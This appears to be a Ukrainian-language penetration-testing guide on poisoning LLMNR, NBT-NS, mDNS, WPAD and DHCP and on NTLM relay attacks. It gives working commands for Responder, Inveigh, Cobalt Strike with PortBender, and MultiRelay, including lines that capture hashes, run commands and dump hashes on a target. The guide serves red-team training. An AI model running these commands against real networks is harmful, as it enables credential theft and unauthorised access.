Протоколи мережі

Протоколи локального вирішення хоста

• LLMNR, NBT-NS та mDNS:

• Microsoft та інші операційні системи використовують LLMNR та NBT-NS для локального вирішення імен при невдачі DNS. Так само, Apple та Linux системи використовують mDNS.

• Ці протоколи піддаються перехопленню та підробленню через їх невпізнану, розповсюджену природу через UDP.

• Responder може бути використаний для підроблення служб шляхом відправлення підроблених відповідей на хости, які запитують ці протоколи.

• Додаткову інформацію про підроблення служб за допомогою Responder можна знайти тут.

Протокол автоматичного виявлення веб-проксі (WPAD)

• WPAD дозволяє браузерам автоматично виявляти налаштування проксі.

• Виявлення здійснюється через DHCP, DNS або в разі невдачі - через LLMNR та NBT-NS.

• Responder може автоматизувати атаки WPAD, направляючи клієнтів на зловмисні сервери WPAD.

Responder для отруєння протоколів

• Responder - це інструмент, який використовується для отруєння запитів LLMNR, NBT-NS та mDNS, відповідаючи вибірково на типи запитів, переважно спрямовуючи на служби SMB.

• Він поставляється заздалегідь в Kali Linux, налаштовується в /etc/responder/Responder.conf.

• Responder відображає захоплені хеші на екрані та зберігає їх у каталозі /usr/share/responder/logs.

• Підтримує як IPv4, так і IPv6.

• Версія Responder для Windows доступна тут.

Запуск Responder

• Для запуску Responder зі стандартними налаштуваннями: responder -I <Інтерфейс>

• Для більш агресивного сканування (з можливими побічними ефектами): responder -I <Інтерфейс> -P -r -v

• Техніки захоплення викликів/відповідей NTLMv1 для полегшення розкриття: responder -I <Інтерфейс> --lm --disable-ess

• Підроблення WPAD може бути активоване за допомогою: responder -I <Інтерфейс> --wpad

• Запити NetBIOS можуть бути розрішені на IP атакуючого, і може бути налаштований аутентифікаційний проксі: responder.py -I <інтерфейс> -Pv

Отруєння DHCP за допомогою Responder

• Підроблення відповідей DHCP може постійно отруїти інформацію маршрутизації жертви, пропонуючи більш прихований альтернативний варіант отруєння ARP.

• Це вимагає точного знання конфігурації мережі цільової мережі.

• Запуск атаки: ./Responder.py -I eth0 -Pdv

• Цей метод ефективно може захоплювати хеші NTLMv1/2, але вимагає обережної обробки для уникнення перебоїв в мережі.

Захоплення облікових даних за допомогою Responder

• Responder буде підробляти служби за допомогою вищезгаданих протоколів, захоплюючи облікові дані (зазвичай виклик/відповідь NTLMv2), коли користувач намагається аутентифікуватися проти підроблених служб.

• Можливі спроби зниження до NetNTLMv1 або вимкнення ESS для полегшення розкриття облікових даних.

Важливо зауважити, що використання цих технік повинно бути здійснене законно та етично, забезпечуючи належну авторизацію та уникнення перешкод або несанкціонованого доступу.

Inveigh

Inveigh - це інструмент для пентестерів та команд червоних команд, призначений для систем Windows. Він пропонує функціонал, схожий на Responder, виконуючи атаки підроблення та людини посередника. Інструмент розвинувся з PowerShell скрипту до бінарного файлу C#, з Inveigh та InveighZero як основні версії. Детальні параметри та інструкції можна знайти в вікі.

Inveigh може бути запущений через PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Або виконано як C# бінарний файл:

Inveigh.exe

Атака NTLM Relay

Ця атака використовує сесії аутентифікації SMB для доступу до цільової машини, надаючи системний shell у разі успіху. Основні передумови включають:

• Користувач, який аутентифікується, повинен мати локальний адміністративний доступ на пересиланому хості.

• Підпис SMB повинен бути вимкнений.

Перенаправлення та тунелювання порту 445

У випадках, коли пряме мережеве підключення неможливе, потрібно перенаправити та тунелювати трафік на порту 445. Інструменти, такі як PortBender, допомагають перенаправити трафік порту 445 на інший порт, що є важливим, коли доступний локальний адміністративний доступ для завантаження драйверів.

Налаштування та робота PortBender в Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Інші Інструменти для Атаки NTLM Relay

• Metasploit: Налаштування з проксі, локальними та віддаленими даними хосту.

• smbrelayx: Скрипт на Python для передачі сеансів SMB та виконання команд або розгортання задніх дверей.

• MultiRelay: Інструмент з набору Responder для передачі конкретних користувачів або всіх користувачів, виконання команд або вилучення хешів.

Кожен інструмент може бути налаштований на роботу через проксі-сервер SOCKS у разі необхідності, що дозволяє здійснювати атаки навіть з опосередкованим мережевим доступом.

Операція MultiRelay

MultiRelay запускається з каталогу /usr/share/responder/tools, спрямовуючи конкретні IP-адреси або користувачів.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Примусові входи NTLM

У Windows ви можете змусити деякі привілейовані облікові записи аутентифікуватися на довільних машинах. Прочитайте наступну сторінку, щоб дізнатися, як це зробити:

Посилання

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html